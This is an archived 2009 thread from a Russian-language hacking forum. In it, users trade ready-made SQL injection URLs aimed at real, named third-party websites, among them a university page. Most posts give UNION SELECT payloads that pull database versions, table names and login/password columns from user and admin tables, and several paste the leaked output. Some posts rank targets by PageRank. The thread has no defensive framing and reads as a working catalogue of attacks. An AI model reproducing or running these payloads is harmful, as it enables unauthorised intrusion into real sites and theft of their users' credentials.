ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9991  
Старый 22.06.2009, 15:59
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Код:
http://www.clownage.fr/paroles.php?id=-9+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x636C5F6E657773+/*+
Код:
http://www.sko-meteo.kz/view_date.php?date=2008-03'+UnIoN+SeLecT+1,table_name,3,4,5,6,7,8+from+information_schema.tables+--+
Код:
http://www.granjard.fr/ameublement.php?id=-13+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,password),7+from+user+/*+
Код:
http://psr-quad.com/fiche_produit.php?proid=-520+UnIon+SeLect+1,2,3,4,5,concat_ws(0x3a3a,login,password),7,8,9,10,11,12,13,14+from+user+--+
PS Где тут админки ???
 
Ответить с цитированием

  #9992  
Старый 22.06.2009, 18:06
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
Провел на форуме:
8945659

Репутация: 103
Отправить сообщение для rolex с помощью ICQ
По умолчанию

PR 4
Цитата:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4 ,5,6,7,concat_ws(0x3a,database(),version(),user()) ,9--
suwalki_glowna:4.1.22-standard:suwalki_glowna@localhost

юзвери:
Цитата:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4 ,5,6,7,concat_ws(0x3a,mail,nick,pass),9+from+users--
админы:
Цитата:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4 ,5,6,7,concat_ws(0x3a,mail,nick,pass),9+from+admin s--
===============================================
PR 4
Цитата:
http://www.thecancer.net/category.php?id=-42+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3--
d60237022:5.0.77-log:u70254108@cgihost
===============================================
PR 3
Цитата:
http://www.nigelwhitfield.com/v2/article.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t(database(),0x3a,version(),0x3a,user()),1),1),5,6 ,7--
nwcomContent:4.1.16:nwcom@localhost
 
Ответить с цитированием

  #9993  
Старый 22.06.2009, 19:42
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.suffolksharks.com/game.php?id=-13+union+select+memberlogin,memberpassword+from+Members--
Database Version: 5.0.67.d7-ourdelta-log
Database name: suffolksharks
User name: suffolksharks@72.167.183.54

----------------------------------------------------------------------------------------------------

Код:
http://www.mblturismo.com.br/lermateria.php?id=-3+union+select+1,version(),3,4,5,6--
Database Version: 5.0.77-community
Database name: mblturi_dbmbl
User name: mblturi_daniel@localhost

----------------------------------------------------------------------------------------------------

PR 6
Код:
http://www.unf.edu/development/news/pressreleases/releaseview.php?id=-586+union+select+1,2,version(),4/*
Database Version: 4.1.22
Database name: news
User name: newsuser@localhost

Последний раз редактировалось Skofield; 22.06.2009 в 22:14..
 
Ответить с цитированием

  #9994  
Старый 22.06.2009, 23:14
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://nnv.nepalnews.com.np/videoplay1.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--

4.1.22-standard:nnvdo_nnvdodb@localhost:nnvdo_nnv


########################################

http://www.jiou-li.com.tw/modules/shop/shop_view.php?id=1&pid=215+and+substring(version() ,1,1)=5--

Последний раз редактировалось HAXTA4OK; 22.06.2009 в 23:19..
 
Ответить с цитированием

  #9995  
Старый 22.06.2009, 23:17
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.sweatclubs.com/partner-physicians.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,vchUserName,vchUserPassword),6+from+BIM_UserMaster--
Database Version: 5.0.83-log
Database name: sweat
User name: cpt12345@localhost

Последний раз редактировалось jokester; 22.06.2009 в 23:40..
 
Ответить с цитированием

  #9996  
Старый 23.06.2009, 09:17
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

moemesto.ru pr-7 тИЦ 2700
Цитата:
http://moemesto.ru/tags/%E4%EE%EC'%0bunion%0bselect%0bversion()--%0b/
5.0.45-log

К сожалению длина значения вставляемого через ЧПУ ограничена(мб регулярка в .htaccess и режет) поэтому from и etc не влезет уже...
 
Ответить с цитированием

  #9997  
Старый 23.06.2009, 14:36
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://sms-fun.org/viewjokes.php?id=2652+and+substring(version(),1,1)=5

http://www.india6666.com/jokes/viewjokes-114+and+substring(version(),1,1)=5--+.html

http://kannadahanigalu.com/viewjokes.php?jokes=252&id=3592+and+substring(version(),1,1)=5

http://www.coolstuffs.in/jokes/jokescript/tamil_jokes/viewjokes.php?7325&id=3463+and+substring(version(),1,1)=5
 
Ответить с цитированием

www.kryshavel.by
  #9998  
Старый 23.06.2009, 14:50
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию www.kryshavel.by

http://www.kryshavel.by/photos.php?fotosectionid=-2+union+select+1,2,3,4,concat_ws(0x0b,version(),us er(),database()),6/*&kind=Rocky
Цитата:
5.0.32-Debian_7etch5-log
kryshavelby@localhost
kryshavelby
Таблички:
http://www.kryshavel.by/photos.php?fotosectionid=-2+union+select+1,2,3,4,group_concat(0x0b,table_nam e),6+from+information_schema.tables+group+by+table _schema+limit+1,1/*&kind=Rocky
Цитата:
items,
docs,
security,
materialgroup,
faqs,
dillermessages,
statistic,
news,
fotos,
dillerprices,
params,
fotosections,
dillers,
prices
 
Ответить с цитированием

  #9999  
Старый 23.06.2009, 14:53
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

Не знаю, байан или нет, антибайан в дауне сейчас...

http://bla-bla-bla.ru/zags/brak.php?id=-920+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,concat_ws(0x3a,version(),user(), database()),22,23
5.0.45:user_blablablaru@localhost:bla-bla-bla_ru
 
Ответить с цитированием

  #10000  
Старый 23.06.2009, 17:04
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
Провел на форуме:
8945659

Репутация: 103
Отправить сообщение для rolex с помощью ICQ
По умолчанию

PR 4
Цитата:
http://www.agoraquest.com/article.php?sid=99999999+union+select+1,2,3,4,5,co ncat_ws(0x3a,database(),version(),user()),7,8,9--
PR 3
Цитата:
http://www.marlowconnell.com/member.php?ID=9999+union+select+1,concat_ws(0x3a,d atabase(),version(),user()),3,4,5,6,7,8,9--
PR 2
Цитата:
http://www.ktimalaniti.com/article.php/section.php?id=99999+union+select+concat_ws(0x3a,d atabase(),version(),user()),2--
--------------------------------------
Цитата:
http://www.ppabc.com/member.php?id=999999+union+select+1,2,concat_ws(0x 3a,database(),version(),user()),4,5--
Цитата:
http://en.ludeales.com/member.php?id=9999999+union+select+concat_ws(0x3a, database(),version(),user()),2,3,4--
Цитата:
http://www.medic.org.ru/library/cat/sex.php?id=-1+union+selecT+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11--
Цитата:
http://mebelinfo.biz/article.php?id=99999+union+select+1,2,concat_ws(0x 3a,database(),version(),user()),4,5,6--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ